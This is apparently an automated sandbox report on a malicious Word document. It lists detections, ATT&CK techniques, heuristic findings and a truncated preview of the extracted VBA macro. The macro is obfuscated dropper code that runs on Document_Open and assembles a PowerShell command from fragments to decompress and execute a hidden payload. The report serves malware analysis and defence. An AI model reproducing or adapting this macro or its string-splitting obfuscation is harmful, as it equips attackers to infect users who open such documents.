MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro is designed to execute a command using the Windows shell, likely to download and run a secondary payload. The reconstructed command string indicates the use of PowerShell to achieve this, and the ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6605185-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605185-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18657 bytes |
SHA-256: 0e490de2f2b04c9dd1dccb6e2f00eb9c4d4c8540821886835fc974cd02e6ab91 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RMvlqDMwXTd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cTPqoo = (vTMBVk / oCUTt / 48354 / OLHRo / 93148 + jaffP)
OtAKN = (khbAn / TzfJVw / 47737 / OIHZA / 85388 + LtjWG)
bKUcYo = (dhkiXW / MPzihZ / 99468 / JPTIcW / 75213 + PoUXs)
wRrod = (Gwhjbz / qPSjm / 59682 / FJPMX / 82329 + UqCzw)
OPERnwwdXjd ("" + JTJjZpjjHdq + DRKjqwz + YcSTVV + rlqWB + pCwXMajVW + QpkVADQ + AZTZzWolNwG)
fRmfl = (ihfiP / zcvQiw / 78007 / nMwXq / 39367 + OOiQz)
End Sub
Attribute VB_Name = "KTiURJHuU"
Function YcSTVV()
On Error Resume Next
UNNwPf = IzkPP + dGpkq + (KMlbh / ccrVSw + TFIJW - hvEsib) + NIXQEB - RUhilj
UGYaEKwc = "po" + ImfmJwL + SDIUFTHzidUFbR + "w" + nwXZXqbvtw + poQwCTlzTzPNbm + "e" + SzhVOQWwouZ + NbJNIJuMYCI + "r" + BqiKwlswd + kkZSSIHtJ + "she" + VGzScDP + ZpvOfPdwokdkfu + "l" + kbuQuOWzvU + fJoijApu + "l" + mCiLFZrW + XurbUdAK + " " + TLnTRivuAiFhjZ + ljJzFZiRnlRMO + "( N" + ibqsbPK + dzVLGpKSmcr + "e" + WttjWjf + judaGtjOcbpj + "W-o" + DTKzawal + iEwwutiOMuQa + "Bj" + iQlXzQbQClq + iFOHvjtw + "EC" + iTjzaXYrdmfPJN + zINBLIhhvIwn + "T" + nijTDDPTAtduNa + vBEJjljAl + " i"
KZzzC = hiHMY + jtRiSr + (GdXFX / EOzlOs + soNEim - zJWjsF) + vaOBj - wVZmTZ
BBRZlV = wwiqKz + iHTYR + (GCcNzi / KBzji + RORiUr - dbjkF) + EoFiQb - ffzZE
XhuHc = "o.s" + kztTuFrfMzjJKw + MSQInikhLhXOb + "TRe" + YlDYZnY + DuBBAXlY + "AM" + HHzoFBNLHMidEb + YHXiDnGE + "rE" + jijowwwfdzawz + bRwiaqaG + "Ad" + iBkrTAsjNUiiTQ + ZzwhbJAWbWIa + "E" + GbooRzL + ziNkDhzz + "r"
LKwDY = YSlUYk + MOCqWO + (ujFwIK / GpaMG + HRGztZ - omioBE) + uEiPBQ - QcFwv
tRcJKX = ANQzs + EKNCq + (wnVlnz / NYzpiZ + jkldR - QwwwXM) + PIapi - SkGYf
KuGAKmRhZdw = "( (" + dKHSvduHC + cmHEQzDQcCHKKp + " Ne" + oBBwLXXITjiJQ + fREoaIYoArzlOW + "W" + dUmFFBzlFPwljP + dFbtGAA + "-o" + NAGOmImTj + dtriSSjLKnElz + "Bj" + IvGqcTEp + tWSGMRA + "EC" + WjOwbnR + dIPJRiAqMt + "T " + YEziYwQEzV + raZuwfCKihL + " i" + jEoGVEGhkziP + rBkaHEo + "O.C"
EGshqR = rtPtos + wbRztH + (uijdLJ / HDiwSN + AdXQQt - kzYNz) + mwqHu - NKbMD
dOvOiS = jZwVS + PQjZr + (SHPwk / LZcMh + kDsRz - cqPPUX) + wcllfY - bVZVO
zkplz = irwzt + dOYJfH + (MkGIM / BIAZY + UkIvU - ObqUho) + zaRvo - wEmTX
QrzZu = "omP" + TswUsfk + zRAzBmDn + "R" + ojZoznUpP + DhVbWWSzfw + "E" + anOYPaiVh + VStEwhY + "s" + knujfWiPko + dVwAjPEPhI + "s" + hzJdSTRHJrd + istvSltLjswvE + "iOn" + UZnbzOCjN + QWEKlsKHEWKUOX + ".D" + AGMhOEznjD + icMjtUVXHWHEk + "eF" + vJFYEBuB + TjMXRah + "La" + ccKdbuCYNi + zRtDdifw + "T" + amjZlIzpvZOP + ljiiBcjXarWS + "e"
owCrj = (BYzBIt / Xiaui * 95327 * SwzBw * DCLoD + 36437 * fBwWWj - hMjcVI - JoAzo + IBrwA)
OLhhz = (kuGlsA / wHJMQZ * 99977 * ifcBS * rzwJu + 76413 * wbXQcE - kpsjU - RnbqBJ + TjjFff)
owNIw = (DtVjDX / WdFMXj * 76132 * uOKqO * hiKCWa + 27084 * izbifF - nEzap - fwiZUI + ukDRj)
kJCIBvXMtG = "stR" + JczMwAfmwnVlRs + hsjEVFHlwQPvRk + "Eam" + VnjPjHbQHp + oFBotJwmB + "( [" + EUMQikjULqB + MWMZQSwjLuw + "SYS" + bCImKShLb + qtjYVjXmpX + "T" + zYViqvsaPa + hLYfiiSk + "Em" + jXmYKcXJAqwjK + kqQjUGPYWqJKr + ".io" + EsuHowwS + CGZdLBAKq + "." + CAHiTwPiBRfFt + lDZqnYj + "mE" + AqvLpIABF + rnYVzhk + "mor"
WAfrEP = (lzLSVh / idDDss * 33911 * zijOwi * qGozU + 90969 * KDHZL - BuwhK - qrwdrq + sABHpQ)
IFiXMt = (TzwThD / FhCEAo * 23543 * czHoCz * vRIsj + 86274 * SJzEIY - hYIdPv - FlQiV + cjPYq)
iOFNnndY = "Yst" + fKoWjQP + wfnwvZwK + "ReA" + pqjsOLi + tZNaNuCNUHfi + "m]" + iTzhRhHR + dVMwRaL + " [" + dzhjEaC + iCHakdCZ + "sy" + MiicLJzshDv + aabNwkuHOovmLw + "S" + jwsLhsZwWVaH + pPkGjzJQFp + "t" + wqipAMtHzG + PhBcqaJnaswf + "Em" + PDbSrDr + iPjVNOZXjMBrzw + ".C" + ifhwFsDnvw + fPzrEmSMKFw + "Onv" + VPSBMQE + NYKOpqMtZQYtsT + "ert"
nMjTP = (iHvkd / mjfkll * 4287 * hpzbAQ * fAHcvF + 82730 * EYaio - CTFNbG - knHHRm + wOETwt)
TWQCJ = "]:" + HifvJbMKHOkiW + YKovNzUdS + ":" + pTHfunvizfv +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.